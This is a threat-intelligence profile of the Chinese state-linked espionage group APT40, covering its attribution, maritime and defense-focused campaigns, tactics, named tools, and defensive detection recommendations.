APT40

Background

APT40 is a Chinese state-sponsored cyber espionage group that has been active since at least 2009, with operations directly attributed to the Hainan State Security Department (HSSD), a provincial arm of China's Ministry of State Security (MSS). In July 2021, the U.S. Department of Justice indicted four Chinese nationals -- three MSS officers and one contract hacker -- for APT40's campaigns, providing an unusually detailed picture of how the PRC organizes its cyber operations. The indictment named Ding Xiaoyang, Cheng Qingmin, and Zhu Yunmin as MSS officers who directed operations from the HSSD's offices in Haikou, Hainan Province.

APT40's primary intelligence collection focus has historically been maritime affairs, defense technology, and regional geopolitics, reflecting China's strategic interests in the South China Sea and its broader naval modernization ambitions. The group targets organizations possessing naval technologies, autonomous underwater vehicle designs, submarine communications, and maritime engineering data. Beyond defense, APT40 has expanded its targeting to include government entities, universities, and research institutions in countries across Southeast Asia, the United States, Europe, and Australia.

The group operates using a network of front companies in Hainan Province that recruit hackers from local universities and provide cover for operations. According to the DOJ indictment, the MSS officers created front companies -- including Hainan Xiandun Technology Development Co. -- which were used to hire technical staff who carried out hacking operations under MSS direction. This model of using civilian contractors for state-sponsored operations is common across Chinese intelligence services and complicates attribution efforts.

Notable Campaigns

South China Sea Espionage (2013-2018): APT40 conducted sustained intelligence collection campaigns against governments, military organizations, and maritime companies involved in South China Sea territorial disputes. Targets included the Philippines, Malaysia, Cambodia, and Vietnam, as well as research institutions studying maritime policy. The group sought information on naval capabilities, diplomatic positions, and territorial claims.

U.S. Defense and Maritime Technology Theft (2011-2018): Over nearly a decade, APT40 systematically targeted U.S. defense contractors, universities conducting defense research, and maritime technology firms. The group stole sensitive data related to naval propulsion, autonomous underwater vehicles, submarine sensors, and advanced materials. The DOJ indictment documented theft from organizations in the United States, Austria, Cambodia, Canada, Germany, Indonesia, Malaysia, Norway, Saudi Arabia, South Africa, Switzerland, and the United Kingdom.

Cambodian Election Targeting (2018): In the lead-up to Cambodia's 2018 general elections, APT40 compromised Cambodian government entities, election commissions, media outlets, and opposition figures. The campaign appeared aimed at collecting intelligence on the election process and political dynamics, reflecting China's interest in maintaining favorable political relationships in the region.

Australian Government and Critical Infrastructure (2024): The Australian Signals Directorate (ASD) released a detailed advisory in July 2024 attributing APT40 intrusions to Australian government networks and critical infrastructure. The advisory was notable for documenting APT40's evolution toward exploiting SOHO devices as operational relay infrastructure -- a technique previously most associated with Volt Typhoon -- and for its detailed case studies of specific intrusions with timelines.

COVID-19 Research Targeting (2020): During the early months of the pandemic, APT40 was identified targeting pharmaceutical companies, medical research institutions, and universities involved in COVID-19 vaccine development and public health response. The campaign aligned with broader PRC-directed efforts to collect intelligence on vaccine research and pandemic response strategies.

Tactics, Techniques & Procedures

APT40 is notable for its rapid adoption of newly disclosed vulnerabilities in public-facing infrastructure. The Australian ASD advisory specifically highlighted that APT40 routinely exploits new vulnerabilities within hours of public release, targeting widely used software such as Log4j, Atlassian Confluence, and Microsoft Exchange. The group maintains a readiness to immediately develop and deploy exploits for high-impact vulnerabilities, giving defenders minimal time to patch.

For initial access, APT40 employs a combination of vulnerability exploitation and social engineering. The group conducts well-crafted spear-phishing campaigns using lure documents themed around maritime affairs, defense conferences, academic research, and regional geopolitics. They also deploy the ScanBox reconnaissance framework on compromised websites to profile visitors and identify high-value targets for follow-on exploitation.

Post-compromise, APT40 rapidly deploys web shells -- frequently China Chopper variants -- and establishes multiple persistence mechanisms to ensure continued access even if one vector is discovered. The group uses a mix of custom and shared tools for credential harvesting, including Mimikatz and their custom HOMEFRY password cracker. Lateral movement relies heavily on RDP, valid credentials, and scheduled tasks.

A significant evolution in APT40's tradecraft has been its adoption of compromised SOHO routers and other small office equipment as operational relay boxes (ORBs). By routing traffic through compromised devices in the target's geographic region, the group makes its traffic appear to originate from legitimate local IP addresses, complicating detection and attribution.

Data staging and exfiltration follow established patterns: files of interest are collected and compressed (often using RAR with password protection) in staging directories before being exfiltrated over encrypted channels to attacker-controlled infrastructure.

Tools & Malware

• ScanBox -- A JavaScript-based reconnaissance framework deployed on compromised websites to profile visitors, collecting browser type, OS, IP address, installed plugins, and keystrokes. Used to identify high-value targets for follow-on attacks.
• BADFLICK (also PHOTO) -- A backdoor that provides reverse shell access, file browsing, and arbitrary command execution. Communicated over HTTP and supported file upload/download operations.
• AIRBREAK -- A JavaScript-based backdoor delivered via malicious documents that communicates with C2 servers via HTTP requests to attacker-controlled pages.
• FRESHAIR -- A minimal backdoor designed for initial triage, determining whether a compromised system warrants deployment of more capable implants.
• HOMEFRY -- A 64-bit Windows password cracker and credential dumping tool used to extract cached and stored credentials from compromised systems.
• MURKYTOP -- A command-line reconnaissance tool that performs network and system enumeration, identifying domain controllers, network shares, and user accounts.
• Derusbi -- A sophisticated backdoor with multiple variants (client-side and server-side) providing comprehensive remote access capabilities. Shared across several Chinese APT groups.
• NanHaiShu -- A remote access trojan named for its association with South China Sea (Nanhai) espionage operations. Communicates via HTTP and provides standard backdoor capabilities.
• SoftEther VPN -- A legitimate open-source VPN tool repurposed by APT40 to create encrypted tunnels for persistent access and data exfiltration, blending in with normal VPN traffic.
• China Chopper -- A lightweight, widely used web shell that provides file management, command execution, and database access through a simple client-server architecture.
• Cobalt Strike -- Commercial adversary simulation framework used with custom configurations for post-exploitation operations.

Indicators & Detection

Vulnerability Window Monitoring: APT40's ability to exploit vulnerabilities within hours of disclosure demands that organizations have robust vulnerability intelligence and rapid response capabilities. Maintain real-time feeds from CISA KEV, vendor advisories, and threat intelligence providers. Prioritize patching of internet-facing systems and have pre-planned mitigations (WAF rules, network segmentation, service disabling) ready for situations where immediate patching is not possible.

SOHO Device Hygiene: APT40's use of compromised SOHO devices as proxy infrastructure means that organizations should monitor for unexpected traffic from residential IP ranges, particularly when that traffic targets management interfaces or sensitive internal systems. Maintain firmware updates on all edge devices and replace end-of-life equipment.

ScanBox Detection: Monitor for JavaScript injection on organizational websites and partner portals. Implement Content Security Policy headers that restrict script execution to known sources. Review web server logs for indicators of ScanBox framework deployment, including characteristic JavaScript filenames and callback patterns.

Spear-Phishing Defense: Given APT40's sophisticated lure creation, organizations in the defense, maritime, and research sectors should implement enhanced email security controls. Monitor for documents containing maritime or defense conference themes, deploy sandbox analysis for email attachments, and train personnel to recognize targeted social engineering.

Credential Monitoring: Deploy robust credential theft detection, including monitoring for LSASS access, SAM database queries, and Kerberos ticket manipulation. APT40's HOMEFRY tool targets cached credentials, so monitor for unexpected credential cache access patterns and enforce credential hygiene practices including regular rotation of service account passwords.

Network Segmentation: Implement strict network segmentation between systems containing sensitive maritime, defense, or research data and general-purpose networks. APT40's lateral movement patterns focus on identifying and accessing file servers and repositories containing high-value technical data.